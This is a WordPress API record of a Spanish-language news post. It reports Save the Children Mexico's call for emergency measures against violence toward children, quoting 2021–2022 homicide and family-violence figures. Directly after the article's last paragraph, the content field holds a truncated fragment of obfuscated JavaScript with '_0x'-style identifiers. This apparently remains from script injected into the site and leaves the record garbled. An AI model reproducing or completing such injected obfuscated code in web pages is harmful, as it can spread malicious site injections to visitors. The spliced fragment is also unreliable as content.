{"id":1771,"date":"2022-04-30T02:11:08","date_gmt":"2022-04-30T02:11:08","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=1771"},"modified":"2022-04-30T02:11:10","modified_gmt":"2022-04-30T02:11:10","slug":"ninos-levantan-la-voz-para-reclamar-derechos","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=1771","title":{"rendered":"Ni\u00f1os levantan la voz, para reclamar derechos"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20200610-WA0111-1024x768.jpg\" alt=\"\" class=\"wp-image-1772\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20200610-WA0111-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20200610-WA0111-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20200610-WA0111-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20200610-WA0111.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas.- La Asociaci\u00f3n Save the Children en M\u00e9xico, hizo un llamado al gobierno y la sociedad para detener la violencia y proteger los derechos de ni\u00f1as, ni\u00f1os y adolescentes en el pa\u00eds, esto en el marco de las celebraciones del D\u00eda de la Ni\u00f1a y el Ni\u00f1o este pr\u00f3ximo 30 de abril.\u201cDe acuerdo con datos oficiales, en 2021 cada d\u00eda 7 ni\u00f1as, ni\u00f1os o adolescentes fueron asesinados diariamente y 37 sufrieron violencia f\u00edsica , esto sin contar los m\u00faltiples casos que no son identificados ni denunciados. Para 2022, tan solo en el primer trimestre se han registrado 595 homicidios de ni\u00f1as y ni\u00f1os y un aumento del 83.52% de reportes de violencia familiar con respecto del a\u00f1o 2015\u201d, citan en un escrito.Save the Children hace un llamado al gobierno para generar e implementar un Programa de Emergencia para Prevenir, Atender, Sancionar y Erradicar todas las formas de Violencia contra las ni\u00f1as, ni\u00f1os y adolescentes;Demanda fortalecer urgentemente los sistemas integrales de protecci\u00f3n a ni\u00f1as, ni\u00f1os y adolescentes y las capacidades institucionales de las Fiscal\u00edas Generales, de los Ministerios P\u00fablicos y de las Procuradur\u00edas de Protecci\u00f3n de la Ni\u00f1ez, \u201cpara gestionar coordinada y eficientemente los casos de vulneraci\u00f3n a los derechos de la ni\u00f1ez integrando la perspectiva de g\u00e9nero\u201d.Exige garantizar la pronta impartici\u00f3n de justicia de todos los casos de ni\u00f1as, ni\u00f1os y adolescentes que han sido afectados por la violencia, los matrimonios forzados, desaparecidos o asesinados y establecer medidas para garantizar la no repetici\u00f3n de graves violaciones a derechos humanos.Piden definir e implementar estrategias de prevenci\u00f3n que atiendan las causas estructurales de la violencia \u201cfortalecimiento familiar; erradicaci\u00f3n de roles y estereotipos de g\u00e9nero que limitan su desarrollo, promoci\u00f3n de la crianza con ternura, resoluci\u00f3n pac\u00edfica de los conflictos y la construcci\u00f3n de una cultura de igualdad y paz\u201d.\u201cCampa\u00f1as de comunicaci\u00f3n que visibilicen la situaci\u00f3n y generen consciencia y transformaci\u00f3n de las pr\u00e1cticas y actitudes patriarcales que violentan a las ni\u00f1as, ni\u00f1os y mujeres; garantizar un entorno familiar y comunitario propicio para la protecci\u00f3n, bienestar y desarrollo de la ni\u00f1ez, lo que implica estrategias de combate a la pobreza\u201d, concluyen.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez San Crist\u00f3bal de Las Casas.- La Asociaci\u00f3n Save the Children en M\u00e9xico, hizo un llamado al gobierno y la sociedad para detener la violencia y proteger los derechos de ni\u00f1as, ni\u00f1os y adolescentes en el pa\u00eds, esto en el marco de las celebraciones del D\u00eda de la Ni\u00f1a y el Ni\u00f1o este pr\u00f3ximo &hellip;<\/p>\n","protected":false},"author":2,"featured_media":1772,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-1771","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1771","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1771"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1771\/revisions"}],"predecessor-version":[{"id":1773,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1771\/revisions\/1773"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/1772"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1771"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1771"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1771"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}